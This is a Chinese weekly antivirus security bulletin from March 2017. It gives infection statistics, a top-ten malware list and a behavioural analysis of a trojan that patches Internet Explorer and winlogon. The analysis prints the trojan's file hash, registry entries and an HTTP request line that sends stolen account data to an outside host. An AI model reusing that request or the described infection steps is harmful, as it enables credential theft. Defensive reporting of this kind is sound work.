最新病毒库日期:
  • 一周安全播报(3.13-3.19)
2017-03-20 09:34 来源:未知
【文章摘要】一周安全播报。
(一) 总体情况分析
上周互联网安全威胁程度为中度。
(二) 计算机病毒情况
1、 上周计算机病毒威胁程度为(轻度、中度、严重),判断依据?
上周计算机病毒威胁程度为中度。
2、 上周截获病毒、感染机器数量?与前一周比变化情况?
上周流行病毒种类跟之前一周相比(10576→10022)下降了5% ,而感染的计算机台数(218175→207676)下降了5% 。
3、 上周危害较大的计算机病毒名称、类型、传播方式、主要危害等情况?
  排名 英文名称 中文名称 变化趋势 所占百分比 感染计算机数量
  1 Downloader.DoubleAgent.a 暂无 →0  3.74% 7630
  2 Variant.Graftor.cdt 暂无 ↑3  3.74% 7630
  3 Malware.Heur2.ix 暂无 ↓1  3.19% 6500
  4 TR.Crypt.aht 暂无  1.87% 3815
  5 Malware.Heur2.nd 暂无  1.66% 3391
  6 Backdoor/Bifrose.lkj 暂无 ↓3  1.66% 3391
  7 Malware.Heur2.bw 暂无  1.52% 3109
  8 Malware.Heur2.bn 暂无  1.45% 2967
  9 TrojanDownloader.JS.bbah 暂无  1.45% 2967
  10 TR.Dldr.a 暂无 ↓3  1.25% 2543
  合计         43943
4、本周计算机病毒威胁程度为(轻度、中度、严重),判断依据?
本周的计算机病毒危险预计为中度。
5、本周需重点关注的病毒及防范建议?
本周需要关注的病毒行为分析:   
病毒名称: Trojan/Win32.Patched.jw
病毒类型: 木马
文件 MD5: 08B1E84039B780EBB791D4263D149A65
公开范围: 完全公开
危害等级: 4
文件长度: 38,385 字节
感染系统: Windows98以上版本
开发工具: Microsoft Visual C++ 6.0
加壳类型: FASM v1.5x
病毒描述 
病毒运行后在系统目录下创建一个目录,并衍生多个病毒文件到该目录下,将衍生的病毒文件创建时间设置为系统的user32.dll文件的创建时间,创建一个hlp.dat到%System32%目录下,打开系统的spooler服务、调用病毒衍生的驱动文件,执行完毕后删除自身,将系统的iexplore.exe、winlogon.dat文件拷贝到%Windir%\temp\目录下作为备份,然后对系统的这2个文件进行感染,修改iexplore.exe、winlogon.dat文件的入口点,使其运行后先执行病毒代码,添加注册表项,最后将自身移动到系统目录下。
行为分析-本地行为
 1、衍生病毒文件到以下目录:
%System32%\hlp.dat (该文件的数据为十六进制shellcode病毒恶意代码)
%Documents and Settings%\当前用户\Local Settings\Application Data\Windows Server\server.dat (病毒自身文件)
%Documents and Settings%\当前用户\Local Settings\Application Data\Windows Server\admin.txt (记录的SQL账户信息)
%Documents and Settings%\当前用户\Templates\memory.tmp (病毒自身文件)
2、当用户打开IE浏览器时病毒代码会执行打开hlp.dat文件的操作,将文件的shellcode读到内存,对IE浏览器入口点代码进行还原操作,然后病毒创建一个线程执行恶意操作并跳转到IE原入口地址继续执行,这个病毒会记录WINDOWS登陆账户信息,试图窃取SQL账号密码信息以URL方式发送到作者地址中。
3、添加注册表项:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations
值: 字符串“\??\C:\WINDOWS\TEMP\winlogon.dat\??\C:\WINDOWS\TEMP\dllcache\winlogon.dat\??\C:\WINDOWS\TEMP
\iexplore.dat\??\C:\Documents and Settings\a\Templates\memory.tmp”
行为分析-网络行为
提交窃取的账户信息并请求数据
GET /message.php?subid=190&br=IE&os=261&flg=0&id=9ba08a0127bbdcbfa6dee0c0622f9892&ad=ad HTTP/1.1
Host: globalcloudcontroller.com
User-Agent: iexplore.exe;Windows NT 5.1
应对措施及建议:
1. 建立良好的安全习惯,不打开可疑邮件和可疑网站。
2. 不要随意接收聊天工具上传送的文件以及打开发过来的网站链接。
3. 使用移动介质时最好使用鼠标右键打开使用,必要时先要进行扫描。
4. 现在有很多利用系统漏洞传播的病毒,所以给系统打全补丁也很关键。
5. 安装专业的防毒软件升级到最新版本,并开启实时监控功能。
6. 为本机管理员账号设置较为复杂的密码,预防病毒通过密码猜测进行传播,最好是数字与字母组合的密码。
7. 不要从不可靠的渠道下载软件,因为这些软件很可能是带有病毒的。